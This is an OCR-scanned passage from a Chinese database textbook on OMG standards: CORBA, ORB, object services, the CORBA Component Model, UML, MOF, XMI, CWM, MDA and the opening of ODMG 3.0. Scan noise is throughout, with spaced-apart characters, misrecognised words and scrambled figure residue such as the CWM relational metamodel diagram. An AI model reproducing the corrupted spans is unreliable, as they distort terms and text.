式 。ORB 类 似 于 X500 电子 邮件 通信 标准 ， 在 这 个 标准 中 ， 请 求 者 可 以 向 其 他 应 用 程序 或 者 
结 点 发 送 请 求 ， 而 不 需要 知道 对 方 的 目录 服务 结构 。 这 样 ，ORB 通过 提供 这 种 允许 对 象 之 间 
透明 地 发 送 请 求 和 接收 响应 的 机 制 ， 就 减少 了 许多 复杂 的 远程 过 程 调用 ( RPC)。 这 样 做 的 目 
的 是 为 了 支持 在 异 构 的 分 布 式 环境 中 应 用 程序 之 间 的 互 操 作 性 以 及 透明 地 连接 多 个 对 象 系统 。 


对 象 服务 


对 象 服务 (Object Service) 提供 了 实现 基本 对 象 功 能 的 主要 方法 。 其 中 ， 多 数 服 务 都 是 
面向 数据 库 的 ， 如 表 28-1 所 示 。 


对 象 服务 
集 服务 
并 发 控制 服务 
事件 管理 服务 


外 部 化 服务 


许可 服务 
生命 周期 服务 
命名 服务 
持久 性 服务 
属性 服务 
查询 服务 
联系 服务 
安全 服务 
时 间 服 务 
经 纪 人 服务 
事务 服务 


表 28-1 OMG 对 象 服务 
描 述 
提供 统一 的 方式 ， 创 建 和 操作 常用 的 集 类 型 ， 例 如 ， 集 合 、 包 、 队 列 、 堆 栈 、 列 表 和 二 又 树 
提供 锁 管 理 器 ， 以 协调 多 个 用 户 对 共享 资源 的 访问 
允许 构件 对 其 感 兴趣 的 特定 事件 进行 动态 注册 或 者 取消 注册 
定义 了 如 何 将 对 象 外 部 化 和 内 部 化 的 协议 和 约定 。 外 部 化 (externalization) 将 对 象 的 状态 记 


录 为 一 个 数据 流 〈 例 如 在 内 存 中 、 在 磁盘 上 或 跨 网 络 间 )， 然 后 ， 内 部 化 (internalization) 再 根 
据 它 在 同一 或 不 同 进程 中 创建 一 个 新 对 象 


提供 了 监测 构件 使 用 的 操作 ， 以 保证 构件 的 使 用 行为 正当 ， 保 护 知识 产权 
提供 了 创建 、 复 制 、 移 动 和 删除 相关 对 象 组 的 操作 

提供 了 在 命名 上 下 文 内 将 名 字 与 对 象 绑 定 的 工具 

提供 了 与 持久 化 存储 和 管理 对 象 机 制 的 接口 

提供 把 命名 值 (属性 ) 与 (外 部 ) 构件 关联 起 来 的 操作 

提供 带 谓词 的 说 明 性 查询 语句 ， 包 括 调用 操作 和 调用 其 他 对 象 服务 的 能 力 

在 互 不 相识 的 构件 之 间 提 供 了 一 种 创建 动态 关联 的 方法 

提供 了 标识 和 身份 验证 、 授 权 和 访问 控制 、 审 计 、 安 全 通信 、 不 可 否认 和 管理 等 服务 
在 不 同 的 机 器 间 维 持 单一 的 时 间 标 记 

为 对 象 提供 了 一 种 匹配 服务 。 它 允许 对 象 动态 通告 其 拥有 的 服务 ， 其 他 对 象 则 可 以 注册 服务 
提供 两 阶段 提交 ( 2PC) 来 协调 可 恢复 构件 ， 它 们 或 使 用 了 平板 事务 或 使 用 了 符 套 事务 
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共 设 施 包 含 了 一 组 任务 ， 这 些 任务 是 许多 应 用 程序 都 必须 执行 的 ， 例 如 打印 和 电 
子 邮件 机 制 ， 但 传统 上 是 在 每 一 个 应 用 程序 中 重复 代码 。 在 OMG 参考 模型 中 ， 它 们 可 以 
通过 与 OMA 兼容 的 类 接口 使 用 。 在 对 象 参考 模型 中 ， 公 共 设 施 又 可 被 分 为 水 平公 共 设 施 
(horizontal common facilities) 和 垂直 领域 设施 ( vertical domain facilities)。 目 前 只 有 四 种 公 
共 设 施 : 打印 、 安 全 时 间 、 国 际 化 和 移动 代理 。 领 域 设施 则 是 面向 如 财经 、 卫 生 保健 、 制 造 
业 、 无 线 电 通信 、 电 子 商务 和 交通 运输 等 应 用 领域 的 特殊 接口 。 


28.1.2 ”公共 对 象 请 求 代理 架构 


公共 对 象 请 求 代理 架 构 (CORBA) 定义 了 基于 ORB 环境 的 架构 。 该 架构 是 所 有 OMG 
构件 的 基础 ， 定 义 了 ORB 的 组 成 部 分 及 其 相关 的 结构 。 利 用 通信 协议 GIOP ( General Inter- 
Object Protocol， 通 用 对 象 互联 协议 ) 和 IIOP ( Internet Inter-Object Protocol，Internet 对 象 
互联 协议 ， 是 建立 在 TCP/IP 之 上 的 GIOP)， 一 个 基于 CORBA 的 程序 就 可 以 实现 与 另外 一 
个 基于 CORBA 的 程序 的 互 操作 ， 这 种 互 操作 可 以 跨越 不 同 的 供应 商 、 平 台 、 操 作 系统 、 编 
程 语言 和 网 络 。 

CORBA 1.1 是 1991 年 发 布 的 ， 它 定义 了 一 种 接口 定义 语言 和 若干 应 用 程序 接口 ， 使 得 
客户 -服务 器 能 够 与 某 个 ORB 的 具体 实现 进行 交互 。1997 年 2 月 发 布 了 CORBA 2.0, 通 
过 规范 来 自 不 同 供应 商 的 ORB 之 间 如 何 进 行 互 操作 改进 了 互 操作 性 。1997 至 2001 ( OMG， 
2001 ) 年 间 还 发 布 了 CORBA 2 的 后 续 版 本 。 组 成 CORBA 的 成 分 包括 : 

e 一 个 中 立 于 实现 的 接口 定义 语言 ( Interface Definition Language，IDL)， 使 得 类 的 接 

口 描述 既 独 立 于 任何 一 个 具体 的 DBMS 也 独立 于 任何 一 种 具体 的 编程 语言 。 对 每 一 
种 支持 的 编程 语言 都 提供 了 一 个 IDL 编译 器 ， 使 得 程序 员 可 以 使 用 他 们 熟悉 的 结构 。 

e 一 个 类 型 模型 (type model)， 该 类 型 模型 定义 了 可 以 在 网 络 中 传输 的 数据 。 

e 一 个 接口 池 ( Interface Repository)， 里 面 存储 着 持久 IDL 的 定义 。 客 户 应 用 程序 可 
以 查询 接口 池 ， 以 获得 所 有 已 注册 的 对 象 的 接口 、 对 象 支持 的 方法 、 方 法 所 需 的 参 
数 以 及 可 能 引发 的 异常 等 信息 。 
获得 对 象 的 接口 和 规范 的 方法 。 

e 在 OID 和 字符 串 之 间 进 行 转换 的 方法 。 

如 图 28-3 所 示 ，CORBA 为 客户 提供 了 两 种 机 制 ， 用 于 发 布 其 对 对 象 的 请 求 : 

e 使 用 针对 特定 接口 的 存根 (stub) 和 框架 (skeleton) 的 静态 调用 。 

e 使 用 动态 调用 接口 (Dynamic Invocation Interface，DII)( 稍 后 说 明 ) 的 动态 调用 。 
静态 方法 调用 

根据 IDL 的 定义 ，CORBA 对 象 可 以 被 映射 到 某 种 特定 的 编程 语言 或 者 对 象 系统 中 ， 例 
如 C、C++、Smalltalk 和 Java。IDL 编译 器 可 以 生成 三 个 文件 : 

e 一 个 头 文件 ， 同 时 包含 于 客户 端 和 服务 器 端 。 

e 一 个 客户 源 文件 ， 包 含 了 一 组 接口 存根 ( stub)， 用 于 将 请 求 传送 给 该 IDL 编译 文件 

中 定义 的 接口 的 服务 器 。 
e 一 个 服务 器 源 文件 ,包含 了 一 组 在 服务 器 端 完成 的 、 能 提供 所 需 行为 的 框架 


(skeleton ) 。 
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图 28-3 CORBA ORB 的 架构 
动态 方法 调用 

静态 方法 调用 要 求 客户 对 它 使 用 的 服务 器 上 的 每 个 接口 都 有 一 个 IDL 存根 。 如 果 客 户 
不 知道 新 创建 的 对 象 的 接口 ， 因 此 也 就 不 存在 相应 的 存根 来 产生 服务 请 求 ， 显 然 ， 客 户 也 
就 无 法 使 用 新 创建 的 对 象 服 务 。 为 了 解决 这 种 问题 ， 动 态 调 用 接口 (Dynamic Invocation 
Interface，DII) 允许 客户 在 运行 时 识别 对 象 及 其 接口 ， 然 后 构造 并 激活 这 些 接口 以 及 接收 这 
些 动态 调用 的 结果 。 对 象 和 对 象 所 提供 的 服务 的 规范 被 存储 在 接口 池 中 。 

DII 在 服务 器 端的 对 应 物 是 动态 框架 接口 (Dynamic Skeleton Interface，DSI)，DSI 是 一 
种 将 来 自 ORB 的 请 求 分 发 给 一 个 对 象 实现 的 方式 ， 该 实现 并 不 知道 它 正 实现 的 对 象 编译 时 
的 情况 。 有 了 DSI， 对 操作 的 访问 将 不 再 通过 由 IDL 接口 规范 产生 的 特定 操作 框架 ， 而 是 通 
过 这 样 一 个 接口 ， 它 利用 来 自 接口 池 的 信息 提供 对 操作 名 和 参数 的 访问 。 

对 象 适配器 

在 架构 中 还 包括 了 对 象 适配器 ， 通 过 对 象 适配器 ,( 服 务 器 端 ) 对 象 实现 能 访问 由 ORB 
提供 的 服务 。 对 象 适配器 负责 对 象 实现 的 注册 、 对 象 引 用 的 产生 和 人 解释、 静态 和 动态 方法 调 
用 、 对 象 和 实现 的 激活 与 去 活 以 及 安全 协调 。CORBA 要 求 一 种 标准 适配器 ， 称 为 基本 对 象 
适配器 (Basic Object Adapter)。 

不 幸 的 是 CORBA2.X 对 象 模型 有 若干 局 限 : 

@ 没有 标准 方式 用 于 部 署 对 象 实现 。 在 该 规范 中 未 叙述 在 服务 器 进程 中 如 何 部 署 对 象 
实现 (例如 ， 对 象 实 现 如 何 分 布 ， 在 可 执行 状态 下 如 何 安装 那些 实现 ， 在 ORB 中 怎 
样 激活 实现 )。 因 此 ， 在 一 个 系统 中 实例 化 所 有 对 象 时 ， 可 能 采用 各 类 特殊 的 方案 。 
而 且 ， 由 于 对 象 之 间 可 能 互相 依赖 ， 在 一 个 大 规模 分 布 系统 中 部 署 和 实例 化 对 象 非 
常 复 杂 且 不 可 移植 。 

对 公共 CORBA 服务 器 编程 模式 仅 提 供 有 限 的 标准 支持 。CORBA 提供 了 若干 特性 以 
实现 服务 器 。 例 如 ，Portable Object Adapter (POA)， 它 是 ORB 中 负责 把 客户 的 请 求 
传 给 具体 的 对 象 实现 的 机 制 ， 它 就 提供 了 标准 的 API 用 于 向 ORB 注册 对 象 实现 、 根 
据 需求 使 对 象 去 活 或 激活 对 象 实现 。POA 是 灵活 的 ， 提 供 有 一 定 策略 能 配置 其 行为 。 
诚然 ， 在 许多 系统 中 仅 要 求 这 些 特性 的 一 个 子 集 , 但 要 搞 明 白 如 何 配置 POA 策略 以 
获得 所 要 求 的 行为 则 有 一 条 陡峭 的 学 习 曲 线 。 

对 象 功 能 仅 能 有 限 地 扩展 。 对 象 仅 能 通过 继承 扩展 ， 因 此 为 了 支持 新 的 接口 必须 : 
(1 ) 用 CORBA 的 IDL 定义 一 个 新 接口 ， 它 继承 自 所 有 被 要 求 的 接口 ; (2 ) 实现 这 
个 新 接口 ; (3 ) 在 所 有 服务 器 上 部 署 这 个 新 实现 。CORBA IDL 中 多 重 继承 存在 问题 ， 
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因为 CORBA 不 支持 重 载 ， 上 面 的 方法 就 限制 了 多 重 继承 的 可 用 性 。 
e@ CORBA 对 象 服务 的 可 用 性 未 事先 定义 好 。 规 范 中 未 限定 哪些 对 象 服务 在 运行 时 可 用 。 
因此 ， 对 象 开发 者 在 部 署 一 个 系统 时 不 得 不 用 各 自 的 策略 来 配置 和 激活 这 些 服务 。 
@ 缺乏 标准 的 对 象 生命 周期 管理 。 虽 然 CORBA 对 象 服务 定义 了 一 个 生命 周期 服务 
( lifecycle service)， 但 未 强制 使 用 。 因 此 ， 客 户 经 常用 自选 的 方式 管理 一 个 对 象 的 生 
命 周 期 。 而 且 ， 若 CORBA 对 象 已 由 生命 周期 服务 控制 ， 其 开发 者 为 控制 该 对 象 不 
得 不 定义 辅助 接口 。 定 义 这 些 接口 令 人 有 乏味， 应 该 在 合适 处 自动 完成 ， 但 规范 未 支 
持 这 种 自动 化 。 
CORBA3.0 构件 模型 (CCM) 
考虑 到 上 述 的 局 限 ，OMG 推出 CORBA 构件 模型 (CCM) (OMG，2002 ) 用 以 扩展 
CORBA 对 象 模型 ，CCM 中 定义 了 若干 特性 和 服务 ， 使 开发 者 能 实现 、 管 理 、 配 置 和 部 署 构 
件 ， 构 件 通常 集成 所 用 的 服务 ， 例 如 标准 环境 下 的 持久 性 、 事 务 和 安全 性 等 。 此 外 ，CCM 
支持 服务 器 更 大 程度 重用 ， 还 为 CORBA 应 用 的 动态 配置 提供 了 更 大 的 灵活 性 。CORBA3.0 
也 增加 了 Internet 上 通信 的 防火 墙 标准 和 服务 质量 参数 。 
CCM 构件 是 一 个 CCM 系统 的 基本 构建 单元 。 使 用 CCM 时 ， 构 件 开 发 人 员 首 先 定义 他 
们 的 构件 实现 将 支持 的 IDL 接口 ， 然 后 借助 CCM 提供 商 提供 的 工具 实现 这 些 构件 ， 最 终 将 
这 些 构件 打包 为 可 动态 链接 的 程序 集 文件 (如 JAR 文件 ，DLL 或 者 共享 库 )。CCM 开发 商 
提供 了 专门 的 部 署 机 制 用 于 在 构件 服务 器 (component server) 中 部 署 构件 ， 构 件 服务 器 通过 
加 载 构件 程序 集 文 件 持 有 构件 。 用 一 个 容器 为 该 服务 器 中 那些 称 为 执行 者 的 构件 实现 提供 运 
行 时 环境 。 该 容器 中 包含 大 量 预定 义 的 钧 子 ( hook) 和 操作 ， 以 帮助 构件 访问 不 同 的 策略 和 
服务 ， 如 持久 性 、 事 件 通知 、 事 务 、 复 制 、 负 载 均 衡 和 安全 性 等 。 每 个 容器 定义 了 一 组 运行 
时 策略 和 机 制 ， 比 如 事件 分 发 策略 和 构件 使 用 类 别 等 ， 负 责 为 所 管理 的 构件 初始 化 和 提供 运 
行 上 下 文 。 其 实 构件 实现 都 关联 着 用 XML 写 的 元 数据 ， 元 数据 已 说 明了 所 要 求 容器 的 策略 
和 机 制 。 
图 28-4 展示 了 典型 的 CCM 架构 。 客 户 端 可 直接 访问 构件 外 部 接口 ， 如 facets ( 它 定 
义 一 个 具名 接口 ， 同 步 服务 来 自 其 他 构件 的 方法 调用 ) 以 及 home interface ( 它 规定 了 构 
件 的 生命 周期 管理 策略 )。 相 反 ， 构件 须 通过 其 容器 API 访问 ORB 功能 ， 包 括 内 部 接口 
(internal interfaces) 和 回调 接口 (callback interfaces)。 构 件 通过 内 部 接口 访问 其 所 在 容器 
提供 的 服务 ， 而 容器 通过 构件 上 的 回调 接口 涉及 构件 。 每 个 容器 管理 一 个 由 构件 实现 框架 
( Component Implementation Framework，CIF) 所 定义 的 构件 ， 稍 后 会 详细 阐述 CIF。 容 器 
为 所 管理 的 全 部 接口 生成 它 自己 的 POA。 
CCM 构件 类 型 CCM 规范 定义 了 两 种 类 型 的 容器 : 会 话 容 器 为 引用 临时 ( transient) 
对 象 的 构件 定义 框架 ， 而 实体 容器 定义 了 引用 持久 〈persistent) 对 象 的 构件 框架 。 这 些 容器 
类 型 与 企业 级 JavaBeans (Enterprise JavaBeans, EJB) 中 的 会 话 和 实体 bean 类 型 相似 ， 我 们 
将 在 29.9 节 讨 论 EJB。 在 CCM 中， 开发 人 员 将 上 述 两 种 类 型 的 容器 与 不 同 内 存 管理 机 制 
以 及 CORBA 应 用 模型 进行 组 合 ， 从 而 实现 不 同类 型 的 构件 。CCM 规范 共 支 持 四 种 类 型 的 
CCM 构件 ， 其 容器 API( 构 件 视角 ) 类 型 和 外 部 API (客户 视角 ) 类 型 的 组 合 如 下 : 
@ 服务 构件 类 型 ( service component category)。 其 无 状态 和 标识 ， 通 过 外 部 接口 定义 
构件 行为 。 这 类 构件 的 生命 周期 和 单一 的 操作 请 求 一 致 。 服 务 构件 类 型 为 描述 现存 
过 程式 程序 提供 了 简洁 的 途径 ， 与 无 状态 的 EJB 会 话 Bean 相似 。 
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图 28-4 CORBA CCM 容器 模型 


会 话 构件 类 型 ( session component category)。 具 有 临时 态 、 非 持久 的 标识 (也 就 是 
说 ， 当 同一 构件 被 多 次 访问 时 ， 标 识 将 发 生 修改 )， 构 件 行为 实现 为 操作 ， 定 义 在 构 
件 外 部 接口 facet 上 。 其 生命 周期 由 特定 的 生命 周期 策略 决定 。 此 类 型 构件 与 有 状态 
的 EJB 会 话 Bean 相似 。 

@ 实体 构件 类 型 (entity component category)。 具 有 客户 端 可 见 的 持久 态 ， 由 实体 类 容 

器 的 实现 管理 。 其 持久 性 标识 通过 在 home 声明 中 主键 声明 而 使 客户 端 可 见 ， 其 行为 
可 以 为 事务 化 的 。 此 类 型 构件 与 EJB 的 实体 Bean 相似 。 

@ 过 程 构件 类 型 (process component category)。 具 有 客户 端 不 可 见 的 持久 状态 (也 就 
是 说 ， 它 由 进程 容器 的 实现 管理 )， 其 持久 性 标识 只 有 通过 home 定义 中 的 用 户 自 定 
义 操作 才 可 实现 客户 端 可 见 ， 行 为 也 可 以 为 事务 化 的 。 过 程 构件 类 型 旨 在 描述 商业 
过 程 对 应 的 对 象 ， 例 如 创建 订单 的 过 程 ， 而 不 是 诸如 部 门 和 客户 等 实体 对 象 。 过 程 
构件 类 型 和 实体 构件 类 型 最 大 的 区 别 在 于 过 程 构件 的 持久 标识 除非 通过 用 户 自 定义 ， 
否则 对 客户 端 是 不 可 见 的 。 

CCM 构件 实现 框架 CORBA 2.x 隐藏 了 许多 与 分 布 式 计 算 有 关 的 复杂 性 ， 简 化 了 应 
用 的 开发 。 图 28-$a 说 明了 一 个 IDL 2.x 编译 器 是 如 何 生成 能 自动 完成 编列 和 反 编 列 任务 
的 存根 和 框架 的 代码 。 然 而 IDL 编译 器 所 支持 的 构造 十 分 有 限 ，CORBA 2.x 服务 端 应 用 仍 
然 需要 开发 大 量 代码 ， 比 如 定义 IDL 接口 本 身 ， 实 现 它们 的 仆 从 ， 编 写 引 导 和 运行 服务 器 
所 需 全 部 代码 。 为 解决 上 述 问 题 ，CCM 定义 了 构件 实现 框架 (Component Implementation 
Framework, CIF)。 该 框架 由 模式 、 语 言 和 能 简化 与 自动 化 构件 实现 开发 的 工具 组 成 。CIF 
框架 大 大 降低 了 服务 端 应 用 开发 者 的 POA 编程 工作 的 复杂 性 ， 他 们 不 再 需要 处 理 仆 从 的 注 
册 、 激 活 、 去 活 等 操作 ， 也 不 需要 考虑 POA 上 策略 一 致 性 的 问题 。 图 28-5b 说 明了 IDL 3.x 
编译 器 的 工作 原理 。 

OMG 现在 接受 了 企业 Java Bean (EJB )， 一 个 只 允许 Java 作为 中 间 层 编程 语言 的 中 间 
层 规 范 (参见 29.9 节 )。 在 文献 中 ，CORBA 2 通常 是 指 CORBA 的 互 操作 性 和 IIOP 协议 ， 
CORBA 3 是 指 CORBA 的 构件 模型 。 市 场 上 有 很 多 CORBA ORB 的 供应 商 ，IONA 的 Orbix 
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和 Inprise 的 Visibroker 就 是 其 中 较 受 欢迎 的 两 个 产品 。 





口 @B 个 
自动 生成 ”手动 完成 生成 ”继承 
a) CORBA IDL 2.x b) CORBA IDL 3.x 


28-5 自动 化 代码 生成 


28.1.3 其 他 OMG 规范 


OMG 提出 了 一 系列 的 规范 用 于 与 CORBA 接口 一 道 为 分 布 式 软件 架构 和 系统 建 模 。 目 
前 有 若干 补充 规范 可 用 : 

(1 ) 统一 建 模 语言 ( Unified Modeling Language，UML) 提供 了 一 种 描述 软件 模型 的 通 
用 语言 。 通 常 定 义 它 为 “一 种 能 说 明 、 构 建 、 可 视 化 和 文档 化 软件 系统 制品 的 标准 语言 ”。 
本 书 第 四 部 分 创建 的 ER 模型 已 经 使 用 了 UML 的 类 图 符号 进行 描述 ， 并 在 27.8 节 对 UML 
的 其 他 成 分 进行 了 讨论 。 

(2 ) 元 对 象 设施 (Meta-Object Facility，MOF ) 为 元 模型 的 说 明定 义 了 一 种 通用 、 抽 象 
的 语言 。 在 MOF 的 上 下 文中 ,模型 是 相互 关联 的 元 数据 的 集合 ， 描 述 元 数据 的 元 数据 叫 作 
元 -元 数据 ， 由 元 - 元 数据 组 成 的 模型 被 称 为 元 - 元 模型 。 也 就 是 说 ，MOF 是 一 种 元 -元 
模型 ， 或 者 说 MOF 是 元 模型 的 模型 (有 时 也 称 为 本 体 )。 例 如 ，UML 支持 许多 不 同 的 图 ， 
包括 类 图 、 用 例 图 和 活动 图 。 每 一 种 图 的 元 模型 都 不 同 。MOF 还 定义 了 一 个 框架 ， 用 于 实 
现 元 模型 描述 的 元 数据 的 存放 池 。 该 框架 提供 了 将 MOF 元 模型 转换 为 元 数据 API 的 映射 。 
这 样 ，MOF 就 使 得 表示 不 同 领域 的 非 相 似 元 模型 能 以 互 操 作 的 方式 使 用 。CORBA、UML 
和 CWM ( 见 下 文 ) 都 是 与 MOF 兼容 的 元 模型 。 

MOF 元 数据 框架 通常 被 描述 为 一 种 四 层 的 结构 ， 如 表 28-2 所 示 。MOF 对 UML 来 说 非 
常 重要 ， 用 于 确保 每 一 种 UML 的 模型 类 型 都 是 用 一 种 一 致 的 方式 定义 的 。 例 如 ，MOF 确保 
了 类 图 中 的 一 个 “类 ”和 用 例 图 中 的 一 个 “用 例 ” 或 者 和 活动 图 中 的 一 个 “活动 ”之 间 具 有 
一 种 确定 性 的 联系 。 
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表 28-2 OMG 元 数据 架构 


元 级 (meta-level) 





(3 ) XML 元 数据 交换 (XML Metadata Interchange，XMI) 将 MOF 映射 为 XML。XMI 
定义 了 在 XML 中 如 何 用 XML 标记 表示 与 MOF 兼容 的 模型 。 一 个 基于 MOF 的 元 模型 可 以 
被 转换 为 一 个 文档 类 型 定义 (Document Type Definition，DTD) 文档 或 者 一 个 XML 模式 ， 
一 个 模型 则 被 转化 为 一 个 与 其 DTD 或 者 XML 模式 一 致 的 XML 文档 。XMI 被 规定 为 一 
种 “ 流 ” 格 式 ， 因 此 XMI 可 以 被 存储 在 传统 的 文件 系统 里 ， 也 可 以 从 某 个 数据 库 或 者 知识 
库 (repository) 经 由 Internet 以 流 的 方式 传送 。 我 们 会 在 第 30 章 详细 讨论 XML 、DTDs 和 
XML 模式 。 

(4 ) 公共 仓库 元 模型 (Common Warehouse Metamodel，CWM) 定义 了 一 种 既 可 以 表示 
商务 元 数据 也 可 以 表示 技术 元 数据 的 元 模型 ， 这 些 元 数据 通常 出 现在 数据 仓库 和 商务 智能 领 
域 。OMG 认识 到 在 这 些 领域 ， 对 元 数据 的 管理 和 集成 是 一 种 极 大 的 挑战 ， 因 为 这 些 领域 的 
产品 都 有 着 自己 的 元 数据 的 定义 和 格式 。CWM 将 数据 模型 (模式 )、 模 式 转换 模型 、OLAP 
和 数据 挖掘 模型 的 表示 规范 化 。CWM 被 用 作 在 异 构 的 、 多 供应 商 的 软件 系统 之 间 实 现 元 数 
据 实例 互 换 的 基础 。CWM 是 用 MOF 的 术语 定义 的 ,UML 为 其 建 模 符号 (也 是 基础 元 模型 )， 
XMI 是 交换 机 制 。 

如 图 28-6 所 示 ，CWM 是 由 许多 子 元 模型 组 成 的 ， 这 些 子 元 模型 被 组 织 为 18 个 表示 通 
用 数据 仓库 元 数据 的 包 : 

(a) 数据 源 元 模型 (data resource metamodels) 支持 对 遗留 的 和 非 遗 留 的 数据 源 ， 包 括 面 
向 对 象 的 、 关 系 的 、 记 录 的 、 多 维 的 和 XML 的 数据 源 建 模 (图 28-7 为 CWM 的 关系 型 数据 
元 模型 ) 。 

(b) 数据 分 析 元 模型 ( data analysis metamodels) 表示 了 诸如 数据 转换 、 联 机 分 析 处 理 
(OnLine Analytical Processing，OLAP)、 数 据 挖掘 和 信息 可 视 化 等 事物 。 

(c) 数据 仓库 管理 元 模型 ( warehouse management metamodels) 用 于 表示 标准 的 数据 仓 
库 过 程 和 数据 仓库 操作 的 结果 。 

(d) 基础 元 模型 ( foundation metamodel) 支持 不 同 的 通用 服务 的 说 明 ， 例 如 数据 类 型 、 
索引 和 基于 构件 的 软件 部 署 。 


28.1.4 ”模型 驱动 的 架构 


虽然 OMG 希望 OMA 能 够 被 接受 为 通用 的 面向 对 象 的 中 间 件 标准 ， 不幸 的 是 ， 其 他 
的 组 织 也 在 做 着 类 似 的 事情 。 微 软 提出 了 分 布 式 公 共 对 象 模型 ( Distributed Common Object 
Model, DCOM)，Sun 则 开发 了 Java， 随 后 开发 了 Sun 自己 的 ORB 、 远 程 方法 调用 (Remote 
Method Invocation ,RMI)， 最 近 又 开发 了 另外 一 组 能 够 与 XML 和 简单 对 象 访问 协议 (Simple 
Object Access Protocol，SOAP) 接轨 的 中 间 件 标准 ， 微 软 、Sun 和 IBM 都 支持 这 一 标准 。 
与 此 同时 ， 电 子 商务 的 发 展 趋势 加 大 了 各 个 企业 对 其 数据 库 进 行 集成 的 压力 。 这 种 集成 ， 现 
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被 称 为 企业 应 用 集成 ( Enterprise Application Integration，EAI)， 是 当前 企业 面临 的 挑战 之 一 。 对 
于 中 间 件 技术 ， 有 争论 表示 与 其 说 有 助 于 解决 这 一 问题 ， 还 不 如 说 中 间 件 也 是 问题 的 一 部 分 。 







图 28-6 CWM 的 分 层 和 包 结 构 


/constraint /constrainedElement 
deferrability : DeferrabilityType “| ‘(ordered) 


* | /constraint 


precision : Integer 
scale : Integer 
* | isNullable : NullableType 

length : Integer 

collationName : String 

characterSetName : String 
/optionScopeColumnSet : NamedColumnSet 
/referencedTableType : SQLStructuredType 







四 1 SQLDataType 


/structuralFeature /type | typeNumber : Integer 









人 


NamedColumnSet 


/optionScopeColumn ; Column 
htype : SQLStructuredType 


/usingTrigger : Trigger SQLDistinctType 


NS QueryColumnSet length : Integer 


了 1 precision : Integer 
query : QueryExpression scale : Integer 


/SQLSimpleType : SQLSimpleType 









sqlDistinctType 


/constrainedElement 
{ordered} SQLSimpleType 
Table characterMaximumLength : Integer 
characterOctetLength : Integer 
isTemporary : Boolean isReadOnly : Boolean sqlSimpleType| numericPrecision : Integer 
temporaryScope : String checkOption : Boolean numericPrecisionRadix : Integer 
/trigger : Trigger queryExpression : QueryExpression numericScale ; Integer 


isSystem : Boolean dateTimePrecision ; Integer 


图 28-7 CWM 的 关系 型 数据 元 模型 


1999 年 ， OMG 开始 进行 OMA 和 CORBA 以 外 的 工作 ， 提 出 了 一 种 新 的 分 布 式 系统 
开发 方法 。 这 一 工作 使 得 模型 驱动 的 架构 ( Model-Driven Architecture，MDA) 成 为 实现 系 
统 规范 和 互 操作 性 的 方法 ，MDA 是 在 前 面 一 节 讨 论 的 四 种 建 模 规范 的 基础 之 上 提出 来 的 。 
MDA 基于 这 样 一 个 前 提 : 系统 应 该 独立 于 所 有 软 硬 件 细节 来 规范 说 明 。 因 此 ， 尽 管 软件 和 
硬件 可 能 随 着 时 间 而 变化 ， 但 是 规范 说 明 依然 适用 。 重 要 的 是 ，MDA 致力 于 系统 的 整个 生 
命 周 期 ， 从 分 析 和 设计 到 实现 、 测 试 、 构 件 装配 及 部 署 。 


务 28 音 OODBMS 





析 准 与 系统 169 


为 了 创建 基于 MDA 的 应 用 ， 又 提出 了 平台 独立 模型 (Platform Independent Model， 
PIM) 的 概念 ， 该 模型 只 表示 业务 功能 及 业务 行为 。PIM 可 以 被 映射 到 一 个 或 者 多 个 平 
台 相 关 模 型 ( Platform Specific Model，PSM)， 即 可 被 映射 到 CORBA 构件 模型 (CORBA 
Component Model，CCM)、 企 业 JavaBeans ( Enterprise JavaBeans，EJB ) 或 者 微软 的 事务 
服务 器 ( Microsoft Transaction Server，MTS) 等 目标 平台 。PIM 和 PSM 都 是 用 UML 表示 
的 。 该 架构 圳 括 了 由 OMG 已 经 确定 的 所 有 全 方位 的 服务 ， 例 如 持久 性 、 事 务 和 安全 (参见 
表 28-1 ) 等 。 更 重要 的 是 ， MDA 使 得 为 某 些 特定 的 垂直 产业 生成 标准 化 领域 模型 成 为 可 能 。 
OMG 将 定义 一 组 规范 以 确保 某 一 给 定 的 UML 模型 能 够 一 致 地 生成 每 一 个 流行 的 中 间 件 的 
API。 图 28-8 阐明 了 在 MDA 中 不 同 的 构件 之 间 是 如 何 相 互 关联 的 。 







UMI 规 范 
UML 用 例 模 型 


概要 扩展 UML 并 提供 一 致 的 方式 

由 UMIL 模 型 产生 代码 。 另 外 ，MDA 
应 该 支持 逆向 工程 ， 由 基本 代码 产 
生 一 个 PIM ) 








IDL 
代码 


图 28-8 模型 驱动 的 架构 
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28.2 对象 数据 标准 ODMG 3.0 


本 节 回 顾 一 下 由 对 象 数据 管理 组 (ODMG) 提出 的 面向 对 象 数据 模型 (OODM) 的 新 标 
准 。 该 标准 包含 了 一 个 对 象 模型 (参见 28.2.2 节 )、 一 种 等 价 于 传统 DBMS 中 数据 定义 语言 
(DDL) 的 对 象 定义 语言 (参见 28.2.3 节 ) 以 及 一 个 与 SQL 语法 类 似 的 对 象 查询 语言 (参见 
28.2.4 节 )。 首 先 介 绍 ODMG。 


28.2.1 对象 数据 管理 组 


对 象 数据 管理 组 是 由 几 个 重量 级 的 供应 商 发 起 的 ， 旨 在 定义 OODBMS 的 标准 。 这 些 
供应 商 包括 了 Sun Microsystems、eXcelon Corporation、Objectivity Inc.、POET Software、 
Computer Associates 和 Versant Corporation。ODMG 已 经 发 布 了 一 个 对 象 模型 ， 它 给 出 了 
数据 库 对 象 语义 的 标准 模型 。 这 个 模型 很 重要 ， 因 为 它 确 定 了 OODBMS 能 够 理解 并 强制 
的 预定 义 语 义 。 因 而 ， 采 用 这 种 语义 的 类 库 和 应 用 程序 的 设计 在 各 种 支持 该 对 象 模型 的 
OODBMS 中 都 将 可 移植 (Connolly，1994 )。 

关于 OODBMS 的 ODMG 架构 主要 包括 下 列 组 成 部 分 : 

e 对 象 模 型 (OM )。 

e 对 象 定义 语言 (ODL)。 

e 对 象 查询 语言 (OQL )。 

e Ct++、Java 和 Smalltalk 语言 绑 定 。 

接 下 来 ， 本 节 将 就 这 些 组 成 部 分 进行 讨论 。ODMG 最 早 的 版 本 是 于 1993 年 颁布 的 。 此 
后 ， 又 发 布 了 多 个 变动 不 大 的 版 本 ,但 是 ODMG 2.0 这 一 新 且 重 要 的 版 本 于 1997 年 9 月 被 
采纳 ， 其 增强 的 内 容 包 括 : 

e 与 Sun 的 Java 语言 进行 了 新 的 绑 定 。 

e 提出 了 对 象 模型 的 完全 修订 版 ， 引 入 了 一 种 新 的 元 模型 ， 支 持 跨 越 多 种 编程 语言 

对 象 数据 库 语义 。 

e 给 出 了 数据 和 数据 模式 的 标准 外 部 形式 ， 人 允许 在 数据 库 之 间 进 行 数 据 交换 。 

